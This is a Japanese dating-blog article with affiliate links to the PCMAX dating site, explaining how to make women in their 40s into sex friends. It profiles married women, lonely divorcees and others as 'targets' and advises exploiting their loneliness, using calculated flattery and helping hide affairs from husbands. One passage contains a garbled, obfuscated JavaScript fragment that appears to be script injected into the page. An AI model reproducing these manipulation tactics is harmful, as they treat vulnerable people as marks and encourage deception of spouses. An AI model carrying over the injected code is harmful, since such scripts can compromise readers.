40代の女性をセフレにする方法|具体的な7つのポイントを紹介

  • このエントリーをはてなブックマークに追加
  • Pocket

みなさんは40代くらいの女性とセックスしたことはありますか?

AVで「熟女もの」というとちょっとしたフェチに分類されることもありますが、実際の40代の女性はかなりエロいんです…。

ちょっと前にも「美魔女」という言葉が流行っていて、今の40代女性を「おばさん」などと見くびってはいけません。

芸能人にもとても40代に見えないようなきれいな人がたくさんいます。石田ゆり子、松嶋菜々子、深津絵里、吉瀬美智子、米倉涼子…。まさに美魔女ですね。

40代の女性は、若い女の子とは違った色気がありますよね。実はそんなエロい40代の熟女は、セフレにしやすい、且つセフレに最適だということを知っていましたか?

ここでは、40代のセフレを作る具体的な方法や、メリット・デメリットを紹介していきます。

熟女好きの人、もしくは熟女は好きじゃないけどセフレが欲しい人もぜひ最後まで読んで、美人の40代の女性をセフレにして毎日を楽しみましょう。

すべての40代女性に共通する特徴

40代の女性をセフレにするためにはまずは、特徴を把握することが大切です。20代の女の子にアプローチするのとは全く違いますから。

ここではすべての40代女性に当てはまる特徴について紹介します。(下で状況別の40代女性の特徴を紹介します)

あなたが40代の男なら、同年代の女性の特徴はある程度は把握しているはずですが、20代や30代の男なら10歳、20歳離れた女性のことをよく知らないでしょう。

40代の女性に限らず、「相手を知ること」はセフレ作り基本です。相手を知った上で、アプローチを変えていくのです。

まずは40代女性の全般的な特徴から紹介していきますので、理解することから始めましょう。

すべての40代女性に共通する特徴
– 女性の性欲のピークは40歳手前
– 今の生活に不満を感じている人が多い
– 女として扱われないことに悲しさを感じている

女性の性欲のピークは40歳手前

女性の性欲のピークは30代後半から40代と言われています。男に比較して女性は、年齢が上がるにつれて性欲が増していく傾向にあります。

これはホルモンのバランスが、加齢によって変わることが影響しています。

女性は30代後半から卵巣の機能が衰え始め、女性ホルモンが減少していきます。その減少が急激に訪れるのが40代半ば前後。ホルモンはバランスで成り立っています。

女性ホルモンが減少すると、相対的に男性ホルモンが優位になります。性欲を司っているのは「男性ホルモン」なので、40代で性欲が強くなるのです。

同年代の男の減退してくる性欲では満足できず、そのギャップが原因でセックスレスになる夫婦が多いです。

逆に言えば、40代の女性にとっては、20代前半くらいの男の性欲の強さとは相性が良いのです。これは、40代の熟女をセフレにしたい若い男性には、かなり朗報ですね。

※参考記事
40代は性欲のピーク?40代女性の性事情に迫る

今の生活に不満を感じている人が多い

結婚していてもしていなくても、子供がいてもいなくても、今の生活に満足していないと感じる40代の女性が多い。すべての40代の女性の悩みでしょう。

内閣府の政策統括官の行った「満足度・生活の質に関する調査」では、女性は「45 歳~59 歳」の幸福度を表す数値が「5.51」と最も低いくなっている。(25歳〜34歳の女性は「5.85」)

20代は恋愛、仕事など初めてのことが多く、キラキラとした刺激の多い毎日を過ごしていたでしょう。

30代は結婚、出産、子育て、責任のある仕事など、20代ほどバタバタした生活はしてないけど、充実していると感じる日々を過ごす人が多い。

仕事も子育ても落ち着いて、何か夢中になれるものが少なくなるのが40代の女性です。男の場合は順調にいけば、30代より更に責任のある仕事だったり、ポジションを任されて忙しくなります。

かと言って何か新しいことを始めるにも、二の足を踏んでしまう。仕事にも普段の生活にも余裕が生まれるからこそ、その時間をどう過ごしてよいのかわからないもどかしさ。

40代の女性は、明確にできない満足してない日々の生活にモヤモヤを感じているのです。

女として扱われないことに悲しさを感じている

上にも関連しますが、40代の女性は「女として扱われないこと」に悲しさを感じています。結婚している人もしてない人も、20代や30代の頃のように、ちやほやされなくなるのです。

既婚者なら、20代や30代の頃はまだ、旦那さんは「女」として扱ってくれるしれません。でも40代になると、付き合いが10年を超えてくることもあり、女としてというよりは「家族」として扱われるようになるのです。

子供がいる場合には、「妻」にプラスして「母」という肩書もプラスされます。旦那さんはどんどん、40代の女性のことを女として見れなくなるのです。

また職場では、経験も長くなり責任あるポジションについている40代の女性も多いでしょう。部長や課長、プロジェクトリーダーやプロダクトオーナーなど、プレイヤーではなく徐々にマネージャー(管理者)になっていきます。

まわりの人は、責任あるポジションや、役職者に対して「女性扱い」はできませんよね。これはどこの会社でも同じです。

部下や後輩の割合がどんどん増えていくにつれ、「女性」として扱われなくなるのです。仕事へのやりがいを感じる一方で、40代女性は寂しさも感じているのです。

テレビドラマや映画をみていて、20代や30代の女性がちやほやされている場面、恋愛ものをみたときに「悲しさ」を強く感じるみたいです。「もう一回若い頃みたいな恋愛がしたい」「たまには女の子になりたい…」と。

48%の女性がパートナー以外とセックスの経験あり

40代女性のパートナー以外とのセックスの状況を示した円グラフ

これを調べていて僕はびっくりしました。なんと48%の女性がパートナー以外とのセックスの経験があるのです。想像以上でしたね。

※48%とは「特定の人物1人としている」「特定の人物2人以上としている」「出会い系やナンパ等でなりゆきですることがある」「特定の人物と、なりゆきの両方でしている」「以前はしたことはある」の合計値

せいぜい3割とか多くて4割くらいだと思っていましたが、約5割の女性が「不倫」の経験があります。上で説明した3つの特徴が要因としてあるのでしょう。

性欲が増しているのにセックスできなかったり、生活に不満を感じていたり、女として扱われなくなった悲しさだったり。これは人それぞれですが、40代の女性は「現状に満足していない」のです。

40代の女性の状況別の特徴

40代女性の置かれている状況についての表

「40代女性」と言っても上の表のように、それぞれ人によって置かれている状況がまったく違います。

上で紹介した「すべての40代女性に共通する特徴」とは対象的に、ここからはそれぞれ40代女性の置かれた状況別に特徴を紹介していきす。

近頃は「多様化」なんて言葉をよく耳にしますが、結婚するのかしないのか、子供を作るのか作らないのかなど、人生の選択は人によって様々です。

昔は男も女も結婚して、子供を生んで、家を買って、と「当たり前」の価値観が存在していましたが、「多様化」が進んだ今、人によって生き方がバラバラなのです。

狙っている女性、もしくはセフレになりやすそうな女性の状況を理解して、それぞれに合わせてアプローチを変えていくことが大切なのです。

ちなみに、40代の女性の結婚している割合は平成27年国勢調査によれば73%です。(グラフの「有配偶者」)約4人に3人が結婚していることになります。なんとなく想像通りの数字ですかね。

40代の女性の結婚状況を表した円グラフ

それでは前置きが長くなりましたが、それぞれ40代の女性の特徴をみてきましょう。

40代の女性の状況別の特徴
– 【既婚者】セックスレスに悩んでいる女性が多い
– 【既婚者子供がいる】自分の時間が持てるようになる
– 【既婚者子供がいない】それぞれが好きなことに時間を使う
– 【結婚経験がない独身】趣味や仕事に夢中
– 【バツイチの独身】結婚への焦りはない

【既婚者】セックスレスに悩んでいる女性が多い

結婚相手、交際相手とセックスレスだと思いますか?に対する40代女性の回答の円グラフ

40代の女性既婚者の56%もの人が「セックスレス」だと思っています。これは上で説明した、「性欲が強くなる」「パートナー以外と48%の女性がセックスしている」とつながってきますね。

半数以上の40代の女性がセックスレスに悩んでいれば、それは他の男とセックスしたくなるでしょう。40代の男は性欲がどんどんなくなっていきますから、旦那さんとのセックスは望めないわけです。

それはもう旦那さん以外の男で満たすしかない。その結果48%の女性が不倫の経験があるのでしょう。だいたい40代女性のうち2人に1人がセックスレスについて悩んでいると考えれば、セフレにするハードルが低いことがわかりますね。

【既婚者子供がいる】自分の時間が持てるようになる

既婚者で子供がいる40代の女性は比較的、セフレとして狙い目です。上でも説明した通り、セックスレスだと感じている可能性がありますし、自分の時間が徐々に持てるようになるからです。

例えば、25歳で第一子を出産したとしたら、40歳になると子供は15歳です。26歳で生んだら14歳、27歳なら13歳。1人目の子供は中学生になります。また2人、3人子供がいる場合は、その子供たちは小学生でしょう。

子供が小学生や中学生なら、平日の日中は学校に行っているし、休みの日は部活や友達と遊んだりし始めます。幼児や幼稚園に通っているときに比べれば、徐々に手がかからなくなるのです。

つまり、育児にかかる時間が少なくなり、結果40代の女性が自分の時間が持てるようになります。パートをしたり、正社員として復職したり、趣味を見つけたり、たくさんの人が活動的になります。

そのひとつの候補に「恋愛」や「セックス」が入るのです。空いた時間にセフレにあって、若い頃のような恋愛やセックスを楽しむ女性がたくさんいるのです。結婚しているのに「彼氏」を作っている40代女性も多いのです。

特に旦那さんの給料が安定して高い女性は遊びがちです。平日の日中はフリーなわけですから。旦那さんは仕事でいないし、子供たちは学校にいる。

この平日の日中を利用して不倫している専業主婦は多いのです。だから結婚して子供がいて、さらに専業主婦ならセフレにできる可能性はかなり高いということは覚えておきましょう。

【既婚者子供がいない】それぞれが好きなことに時間を使う

結婚はしているけど子供がいない、いわゆる「DINKS」の40代の女性は、趣味や仕事など、自分の好きなことに時間を使っています。

dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toukei/saikin/hw/k-tyosa/k-tyosa18/dl/02.pdf” target=”_blank” rel=”noopener noreferrer”>平成30年の「国民生活基礎調査の概況」(厚生労働省)によれば、全国の世帯総数5,099万1千世帯のうち、「夫婦のみ」の世帯は24.1%となります。(子供はいるけどして結婚世帯が別になった場合を含んでいるので、実際はこの数値より少ない)

夫が好きで結婚はしたが子供は欲しくなかったり、子供ができにくい体質だったり、40歳を超えて結婚したから子供ができにくかったりと人により子供がいない理由は様々です。

少し昔であれば結婚したら子供を2人、3人生むのが当たり前とされてきましたが、上でも書いたように今は人生が「多様化」しています。結婚しても子供を生むのは当たり前ではなくなってきているのです。

DINKSの40代の女性は、子供がいる人より自分で自由に使える時間がたくさんあります。仕事をバリバリやって責任あるポジションにつく人がいたり、趣味に没頭して人生を謳歌する人がいたり、旦那さんとの共通の趣味を休日に思いっきり楽しんでいたり。

ほんとに人それぞれの人生を送っています。この通りDINKSの40代女性は楽しんでいます。だからセフレにするのは、子供がいる人に比べたら難しいです。

ただ、DINKSの離婚率も多いのも事実です。子供がいないので、後腐れなく離婚できたり、相手に依存しないだけの収入が女性側にあったりと、子供がいない世帯と比較すると離婚のハードルが低いのです。

離婚率が多いということは、今の旦那さんに不満を抱えている可能性が高いということです。旦那さんに不満を抱えた40代の女性を見つけることができれば、セフレにできる可能性は十分にあります。

【結婚経験がない独身】趣味や仕事に夢中

まだ結婚したことがない独身の40代の女性は、DINKSと似ていますが、趣味や仕事に夢中である可能性が高いです。もしくは以下の可能性が挙げられます。

未結婚の40代女性の特徴
– 趣味や仕事に夢中である
– マイペースでひとりの時間が好き
– 自立していて男に頼らなくてもいきていける
– 収入が安定している
– 結婚への理想が高すぎて相手を選んでいる
– 恋愛へのトラウマがある
– 若い頃から恋愛とは無縁で結婚を諦めている

40代独身の女性はセフレにするのは難しいでしょう。まったく結婚する気がなく、若い頃から変わらず男遊びが激しい人を見つけない限りは独身はセフレにできません。

独身でも彼氏がいる人はなかなかセフレにするのは難しかったりと、他の40代の女性の状況のなかでも最も難しい層です。

上の特徴からも分かる通り、たくさんのタイプの女性がいます。結婚してない40代の女性はまとめると言い方は悪いですが、「変わっている」のです。

なかでも特に「趣味や仕事に夢中である」「自立していて男に頼らなくてもいきていける」「収入が安定している」の3つに該当する人はまだセフレになる可能性があります。

でも他の特徴を持った人をセフレにしようとアプローチするのは良い戦略じゃない。「セフレ」という若い人たちの文化にあまり興味がないでしょう。

【バツイチの独身】結婚への焦りはない

バツイチの40代女性はまずは結婚への焦りが少ないのが特徴です。一度結婚して、離婚を経験しています。

結婚の酸いも甘いも知っているため、未婚女性に比べて結婚に対しての焦りがないです。人によっては再婚をまったく考えてない女性もいます。

離婚してからどれぐらいの期間が経過しているかにもよりますが、しばらくは恋愛とか結婚はめんどくさいから必要ないと考えている人もいます。

焦りがないので、人それぞれですがバツイチ40代の女性はマイペースに恋愛を楽しんでいる。これが特徴です。あとは離婚が原因で少し恋愛や自分に自信をなくしている人が多い。

40代は女性に限らず、自分の価値観を理解した上で色々な選択をしています。「バツイチ」と言っても色々な状況や考え方を持った女性がいるのです。

それを踏まえてここからは子供がいるか、いないかに分けて説明していきます。子供のいるいないで、置かれる状況はまったく異なります。

その状況を理解してあげることができなければ、バツイチは絶対にセフレにはできませんので把握しましょう。ちなみに比較した場合、セフレになりやすいのは子供がいない女性です。

子供がいるバツイチの女性(シングルマザー)はセフレになりにくい

子供がいるシングルマザーの40代の女性はセフレにはなりにくいのが特徴です。今狙っている女性がいて、どうしてもセフレにしたい場合を除いて、このタイプにアプローチするのはおすすめしません。

大抵に40代のシングルマザーにとって、第一優先は「子供」です。生活の中心には必ず子供がいます。子供の年齢によって状況は変わってきますが、小さければ小さいほど、子供中心な生活を送っています。

恋愛やセックスはどうしても二の次になってしまいます。時間的な問題もありますが、経済的な問題もあって、なかなか出会いを求めていられません。

男性と出会うのもお金がかかりますから…。おそらく職場以外でシングルマザーとは出会うことすら難しいでしょう。

また、子供の人数によっても生活が変わってきます。子供が1人の場合は、その子供が中学生にもなれば自由に使える時間は増えます。

平日は働いていて自由な時間は作れませんが、休日になれば中学生なら部活や友達と遊ぶことが多くなり、母親である40代女性は自由な時間が確保できます。

この時間を使って恋愛をしてもよいし、セフレも作れますが、子供が小さい間は難しいでしょう。2人、3人と子供の人数が増えれば、経済的な余裕もなくなりますし、一番下の子が中学生になるまでは、休日にちょっとした時間を取るのも難しいでしょう。

実家が近くにある、または自分の親と同居していれば、たまには子供を親に任せて遊びにいくことはできますが、高頻度で外出するのはなかなか親が許してくれないのです。

このように子供がいるバツイチの40代女性は、自由に使える時間が限られる、もしくは自由に使えるお金が限られるという理由から、セフレにはなりにくいのです。セフレになりにくいというよりは、出会えないのです。

子供がいないバツイチの女性はセフレになりやすい

一方で子供がいないバツイチの40代女性はセフレになりやすいです。離婚が成立してしばらくは開放感から、思いっきり自分の好きなことに時間を使う女性が多いです。(自ら離婚を望んでいた場合です。)

離婚を切り出させた側だった場合は、しばらくは落ち込んだ気持ちを引きずってしまう人が多いと聞きます。どちらにせよ、しばらくは「恋愛」から遠ざかります。

でも、開放的な気持ちになったり、落ち込んでいたのが落ち着いてくると、寂しくなったり、生活がマンネリ化し始めます。

同年代の友達はほとんどが結婚して子供がいて、飲みに行ったり、遊んだりなど誘いにくい。

結局会社の独身の同僚や、後輩などを引き連れて飲みに行くことが増えたりしますが、それも一時的。ふと、1人で過ごしている休日に「寂しく」なるのです。

夢中になれる趣味がもともとあったり、見つけた人は、それに時間を使えることを幸せに感じます。

でも、ちょっと前まで結婚していて、何気ない出来事を旦那さんに話すことができていたのに、それもできないと考えると辛くなるみたいです。

その日常の不満や寂しさを埋めてあげるようなアプローチを心がければ、案外セフレにするのは簡単。寂しがりやとか寂しいと感じている女の子って、一緒にいる延長でセックスしてしまうのです。

またこの寂しさとか、日常の不満を感じた人がマッチングアプリや出会い系サイトに登録して、男を探しているのです。子供がいないバツイチの40代女性はセフレになりやすいのです。

40代の女性をセフレにする7つのポイント

ではここからは40代の女性をセフレにするために抑えておくべき7つのポイントを紹介します。

セフレになりやすい人をちゃんと見極めて、アプローチする方法さえ間違わなければ案外簡単に40代の女性をセフレにできます。

40代の女性の特徴を把握したら、あとはセフレにするために行動するだけです。このポイントを理解して、行動すれば性欲が強くてエロい女性とのセックスはすぐそこです。

具体的かつ、明日から実践できるようポイントを紹介していくので、ぜひ最後まで読んでみてください。

40代の女性をセフレにする7つのポイント
1.40代の熟女で出会うには出会い系サイトを使う
2.セフレになりやすいか見極める
3.PCMAXを使うなら援デリ業者や割り切りには気をつける
4.熟女の母性本能を刺激する「犬系男子」を意識する
5.適度な距離を保ち続ける
6.女の子扱いしてあげる
7.相手のそれぞれの状況を理解して合わせてアプローチする

1.40代の熟女で出会うには出会い系サイトを使う

まずは、性欲と時間を持て余した40代の熟女とどうやって出会うのかが重要です。出会う人数を確保することがまずは大切です。出会いの最大化です。

僕のおすすめは圧倒的に、出会い系サイトやマッチングアプリを使うことです。

今や主婦でもスマホを使いこなすことが当たり前となっており、時間に余裕のある40代の女性が、出会い系サイトにたくさん登録しています。

また、実際に出会い系サイトに登録している40代の熟女は、積極的に出会いを求めている人が多いのも特徴です。

だから、他の出会いに比べて見極めにかかる時間が少なくてよいのがおすすめする最大の理由です。

出会い系サイトやマッチングアプリ以外で40代の女性に出会うと、「この人はセフレを求めているのか?」「日々の生活に不満を抱えているのか?」など、セフレになりやすいのかどうかの判断に時間がかかってしまうのです。

出会い系サイトを使っている40代の女性の傾向は、20歳〜30歳前後の年下の男を求めている人が多いです。日中の持て余した時間で、サイトを使って年下の男の子を探しているのです。

まずは僕がいつも熟女をセフレにしようと思った時に使っている出会い系サイトへの登録をおすすめします。PCMAX(R18)は熟女が多いし、安心して使えるのがおすすめする理由です。

PCMAXへ無料登録はこちら(R18)

他の方法でも出会えるけどおすすめしない

他の記事では見かける以下の出会う方法はあまりおすすめしません。

おすすめしない40代女性との出会い方
– ストリートやシッピングセンターやスーパーでナンパ
– 居酒屋やバーでナンパ
– SNSナンパ
– 習い事で知り合って仲良くなる

これらすべての出会い方は、相手の女性が「出会いを求めてない可能性がある」からです。よっぽどナンパに自信がある人は問題ないですが、初心者にナンパは難しいです。

僕もストナンの経験はありますが、何回も何回も断られると精神的に辛い…。ナンパ界隈の言葉で「地蔵」になります。地蔵とは声掛けができない状態です。

ナンパでは何回断られても、気にせず次に行ける強靭なメンタルが必要なのです。それを習得するまでに時間がかかるし、成功する保証もありません。だからイケメンとコミュ力がある人以外にナンパはおすすめしないのです。

また現状(2021年1月後半時点)はコロナウイルスの感染拡大の影響もあって、居酒屋やバーなど出会いの場に人がいません。つまり40代女性と、むしろ女性と出会えないのです。

だから自粛ムードのうちはネットで出会いを増やしていくのが正しい戦略だと思っています。

2.セフレになりやすいか見極める

40代の女性と出会ったら、まずはセフレになりやすいかどうか見極めることが大切です。上で伝えた通り、PCMAXで出会えばある程度はセフレになりやすい女性と出会うことができるので問題ありません。

ただ、すでに狙っている40代の女性がいる場合や、別の出会い方で40代の女性と出会っていたら注意が必要です。

相手がもしセフレになりにくい性格で、今まで一度もセフレを作ったことない人だったら、アプローチするために使う時間とお金が無駄になってしまうのです。

上で40代女性の特徴について詳しく説明しましたが、最もセフレになりやすいのは、子供のありなしに関係なく既婚者の女性と、子供がいないバツイチの女性です。

この状況の40代の女性をねらってください。独身女性とバツイチの子供がいる女性はセフレになりにくいのでおすすめしません。

(まれに男遊びが激しい40代の独身女性もいますが、かなり少数。でも出会ってしまえば簡単にセフレにはできます。)

PCMAX内でセフレになりやすそうな40代女性を見極める方法
– 相手のプロフィールや日記をみて「寂しい」や「暇」と書いてあるか確認
– 「彼氏と別れたので」「離婚したばかりなので」も確認する
– お酒好きアピールもセフレになりやすい可能性が高い

セフレになりやすい女性の特徴をまとめた記事もあります。ぜひ合わせて読んでみてください。女性全般のセフレになりやすい特著を詳しく説明しています。

3.PCMAXを使うなら援デリ業者や割り切りには気をつける

PCMAXを使って40代の女性をセフレにしようと思っているなら、援デリ業者や割り切りの女の子には気をつけてください。

援デリ業者とは、出会い系サイトを中心に活動する風俗のようなものです。性を武器にお金を稼ぎたい女の子を雇って、出会い系サイト上にいるムラムラした男性をターゲットに活動しています。

割り切り女はその個人版です。組織として活動しているのが援デリ業者です。どちらもセックスできるけどお金を請求されます。

しかも言葉は悪いですが、ブスが多い…。デリヘルやソープなどの風俗の面接に合格できない子がやっていることが大半なのです。

出会い系サイト上のメッセージで「ホ別イチゴ」とか「ホ別苺」とか言われたら要注意。これはホテルの料金とは別に15,000円欲しいという意味です。

出会い系サイトで活動する風俗のような存在なので、セフレにはなりません。セフレが欲しいと思ったら、援デリ業者や割り切り女には反応しないことが大切です。

PCMAXでは下のキャプチャのようなメッセージが頻繁に届きますが、基本的には援デリ業者や割り切りをやっている子からです。返信するとポイントの無駄遣いになってしまうため、無視しましょう。

PCMAXでの援デリ業者や割り切り女からのメッセージ01
PCMAXでの援デリ業者や割り切り女からのメッセージ02
PCMAXでの援デリ業者や割り切り女からのメッセージ03

また、掲示板への投稿も援デリ業者や割り切りをしている女性が多いです。反応したり、投稿からその子のプロフィールを見るだけでもポイントが消費されるので注意してください。

PCMAXではメッセージを送ったり、相手の子のプロフィールを見るたびにポイントが消費されます。援デリ業者や割り切り女にポイントを使うのはお金の無駄になってしまうでしょう。

4.熟女の母性本能を刺激する「犬系男子」を意識する

出会い系サイトを使って40代の女性を見つけたら、ここからはその熟女への接し方のポイントです。

40代女性の特徴は、総じて母性本能が強いところです。だからこそ、出会い系サイトでも年下の男を求めている人が多いのでしょう。

彼女らにとっては、若い年下の男というだけで可愛く見えてしまうのです。

普段、会社でしか接することのない年代なので、些細な行動でもキュンキュンしてしまうようです。それを意識して「犬系男子」になりきって接すれば良いのです。

「犬系男子」とは、犬のように素直で、飼い主(好きな人)に忠実である男子のことです。犬は飼い主についてまわることが多いですが、それが40代女性には人気です。

40代の女性は、「こんな私が10歳や20歳も年の離れた…」とか「こんなおばさんと一緒にいて楽しいのかな…」と心配しています。

だから、その不安を取り除いてあげられる犬系男子が人気なのです。犬系男子の素直さが、40代女性の不安を取り除き、お互い一緒にいて楽しめる関係を構築できるのです。

例えば、ちょっとしたことを甘えてみることで、母性本能をくすぐれます。また「◯◯さんに会いたいです」とストレートに伝えるのはかなり効果的です。

若いからこその素直さと、意思の真っ直ぐさを感じさせることができ、熟女は可愛いと思いながらもキュンとするでしょう。

40代の熟女は「犬系男子」に癒しを求めているのです。「犬系男子」がわからない人は下に中身をまとめたので、これを参考に「犬系男子」になりきってください。

犬系男子の中身
– 基本的に寂しがりやなので連絡がまめ
– むしろかまってちゃんで1人でいることが苦手
– 人懐っこい
– 正義感が強く筋が通ってないことが嫌い
– 嘘をつくことが苦手
– よく笑う

5.適度な距離を保ち続ける

そしてお互いに都合の良いセフレ関係を築くためには、適度な距離感を保つことが重要です。

40代の女性は家庭が第一です。子供や旦那さんがいない女性は、もちろん自分が1番ですが、結婚していたり子供がいれば、家庭が生活の最も優先すべきことである割合が多いです。

そして現状に不満は感じているものの、家庭を壊すつもりも離婚するつもりもない人が大半です。特に子供がいる場合は、「子供を失いたくない」と考えている女性がほとんどでしょう。

最低限それを守った上で、うまく性欲を満たしたいと思っているのです。親密な関係の男ができたとしても、その人と距離を詰めすぎて旦那にバレてしまうのは、最も避けたい事態です。

子供がいる女性が相手なら、その「バレてしまうかも…」という不安を最小限にとどめてあげる配慮が必要なのです。その配慮こそ、適度な距離を保ち続けることなのです。

相手の40代の女性の不安があまりにも肥大すると、最悪の場合別れることになりかねません。

あまり頻繁には連絡をしないようにし、突然電話をかけるなど、バレてしまうリスクのある行動は避けるようにしましょう。

バレるリスクを高める危険なNG行動とは
– 頻繁にLINEなどのメッセージを送る
– 突然電話をかける
– 突然家に訪問する
– 頻繁に会いたがる
– 遊んでいるときに長時間一緒にいようとする
– キスマークをつけようとする
– 相手の家の周辺で遊ぶ
– 個室以外で食事したりお酒を飲む
– 公共の場でいちゃいちゃしようとする

6.女の子扱いしてあげる

狙っている40代の女性をセフレにしたいなら、もしくはセフレ関係を維持したいなら、一緒にいるときに「男女」の関係を意識させることが重要です。

冒頭の「女として扱われないことに悲しさを感じている」で説明したとおり、40代の女性は普段「女」として見られることが少ない。

だから、女の子扱いしてあげることがかなり効果的です。相手は久しぶりの「恋」をしている気持ちになり、セックス意外にもあなたといるメリットを感じることができます。

そもそも女性は恋愛だったり、「キュンキュン」した先にセックスがあります。これは男との決定的な違いです。

つまり、自分のことを「女」だと感じさせてくれる、「女」に戻してくれる男だけが40代の女性とセックスできるのです。これめちゃくちゃ大事なので覚えてください。

具体的には、「褒めてあげる」「こちらから手をつなぐなど、スキンシップをとる」などですね。

好きな子に接するによう振る舞えばいいだけです。何もない日に突然「簡単なプレゼントをあげる」というのも、女の子としてかなり嬉しいことですね。

単純にすごく喜ばせてあげることができますし、自分を女の子でいさせてくれる相手と一緒にいたいと思うようになるのです。

女の子が特別扱いされていると喜ぶ言動
– 手をつなぐなどのスキンシップ
– 頭なでなで
– 「可愛い」「美人」「スタイルがいい」など褒めてあげる
– 車道側をさりげなく歩いてあげる
– お花をプレゼントする
– 女性がトイレに行っているときにお会計を済ませる
– 「寒くない?」「足いたくない?」と体調に気遣う
– 重い荷物を持ってあげる
– 寒そうにしていれば自分のジャケットを貸してあげる
– ハグを頻繁にする
– レストランで椅子を引いてあげる

※参考:LOVE理論|水野敬也(うわっつらKINDNESS理論、p21〜)

7.相手のそれぞれの状況を理解して合わせてアプローチする

上の「40代の女性の状況別の特徴」で紹介した特徴を元に、それぞれの状況の相手に対してアプローチを変えることも大切です。

旦那さんがいて子供がいるけど、なにか物足りなさを感じている女性に対してぐいぐいアプローチしてもセフレにはなってくれないでしょう。

ぐいぐいアプローチされても、旦那さんやまわりの人にバレるリスクを感じて、離れてしまうからです。

だから状況が人によって全く違う40代の女性をセフレにするなら、相手に合わせた戦略が必要不可欠なのです。

まずは上でも紹介したように、結婚経験がない独身の40代女性はセフレになりにくいのでターゲットから外しましょう。また子供がいるバツイチも外します。

ここからはそれぞれの状況に合わせたアプローチのポイントを紹介していきます。

状況別のアプローチ
7-1.子供がいる既婚者をセフレにする戦略
7-2.子供がいない既婚者をセフレにする戦略
7-3.子供がいないバツイチをセフレにする戦略

7-1.子供がいる既婚者をセフレにする戦略

子供がいる既婚者はセフレになりやすいでしょう。大前提、20代、30代の頃は子育てに追われて、結果セックスレスになったり、夫婦のコミュニケーションが十分に取れてないことが多い。

でも、子供が成長して自由に使える時間が増えたママたちは狙い目です。戦略としては出会い系サイトでつながって食事をするだけ。

至ってシンプルです。そもそもなにか日常に不満を感じていなけば、または性欲が満たされていなければ、出会い系サイトなんて登録しません。

「休日は夫婦でゴルフをしたり、お出かけしたり」とか「休日は趣味のヨガやショッピング」など、日常に満足している人は、現状からの変化を求めないのです。

だから特別な戦略は必要ないのです。出会い系でマッチングして、食事に誘って、流れでホテルや自宅に誘いましょう。あなたが想像しているより、すんなりセックスまで持ち込めるのです。

上で紹介したどの40代女性にも共通するテクニックである「犬系男子になる」「適度な距離を保ち続ける」「女の子扱いしてあげる」を忘れず実行すれば、セフレになってくれるでしょう。

特に子供がいるので、「犬系男子になる」のは有効なテクニックです。母性本能が強いですからね。旦那さんにばれないよう相手に配慮してあげることも忘れずに。

7-2.子供がいない既婚者をセフレにする戦略

まずは子供がいない既婚者に子供についての話題はNGです。場合によっては相手の女性は気分を害してしまうでしょう。

相手が子供についての話題を自ら話したらそれは問題ないですが、あなたからその話をふるのはNGです。30代の頃からまわりから「子供は?」とか「子供は早いほうがいいよ」など言われ続けてきています。

それがすごく嫌と言っている40代の女性にたくさん出会ったことありますし、言われて気分がよくなることは間違いなくありません。子供がいない既婚者に、子供の話題を降るのは百害あって一利なしです。

セフレにしようと狙っているなら、相手に不快な思いをさせてはいけません。いかに気分をよくできるか、癒せるかが勝負です。

あとは、現状に不満を感じていて、出会い系サイトに登録している女性にアプローチすれば、セックスまであっさり持っていけるでしょう。

アプローチするときに気をつける点は、相手は久しぶりの恋愛に自信をなくしていることです。だからその不安を取り除くように、やりすぎなぐらい褒めてあげましょう。わざとらしくてOKです。

女性は褒められないよりは褒められたいのです。ちなみに、子供がいない既婚者の中には、たくさんのセフレがいる女性もいます。

自分で使える自由な時間を使って、セフレとセックスすることをストレス解消だったり、癒やしにしていることもあります。そんなセフレがすでにたくさんいる女性と出会えたらラッキーでしょう。

今のセフレに飽きた人が、PCMAXにはたくさんいて、毎日若い男をさがしています。下の体験談で紹介しますが、僕もこのタイプのヤリマンの40代熟女を1度だけセフレにしました。

PCMAXへ無料登録はこちら(R18)

7-3.子供がいないバツイチをセフレにする戦略

最後は子供がいないバツイチの女性に対する戦略です。この女性たちは離婚してしばらくしたら「寂しさ」に襲われます。

その寂しさを埋めてあげるように、たくさんかまってあげることが大切な戦略です。子供がいる既婚者とは対象的な戦略です。

離婚してしばらくは開放感や、家に旦那がいない新鮮さで独身生活を楽しめますが、しばらく経つと1人でいることが寂しく感じます。

今までは家に何気ないことを話せる旦那がいましたが、家に1人でいると話し相手がいません。また同年代の友達はほとんどが結婚していて子供がいるため誘いにくい。

そんな寂しさを埋めるように、アプローチするのです。具体的にはLINEの返信はなるべく早く返してあげたり、電話を定期的にしてあげたり。

注意点は、恋愛感情を相手に抱かれないことです。セフレ関係は、恋愛感情がどちらかに芽生えてしまえば終わります。だから相手が恋愛体質でないかは、セフレになる前に確かめておく必要があります。

あなたがその女性と付き合うことも考えているなら、問題ありません。でも、セフレ関係しか考えられないのであれば、相手に好意を抱かせてしまうような言動には気をつけましょう。

40代の女性をセフレにして濃厚なセックスを楽しもう

いかがだったでしょうか?今回紹介した40代の熟女の特徴とアプローチ方法をしっかり頭に入れて、熟女のセフレをたくさんつくっちゃいましょう。たくさんと言うとおおげさなようにも聞こえますが、実際に性欲と時間を持て余している熟女は本当にたくさんいます。

そして彼女らもセックスできる相手を求めているのですから、そんなエロい熟女たちを探さない方がもったいないですよね。元から熟女に興味のあった人も、この記事を読んで熟女に興味を持った人も、経験豊富な飢えている40代の女性をセフレにして、エロいセックスライフを楽しんでください。この記事を最後まで読んでくれたみなさんがセフレ作りに成功することを、陰ながら応援しています!

「熟女をセフレにする方法」を別の記事でも紹介しています。合わせて読むとより理解が深まるので、下のリンクより飛んでみてください。

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。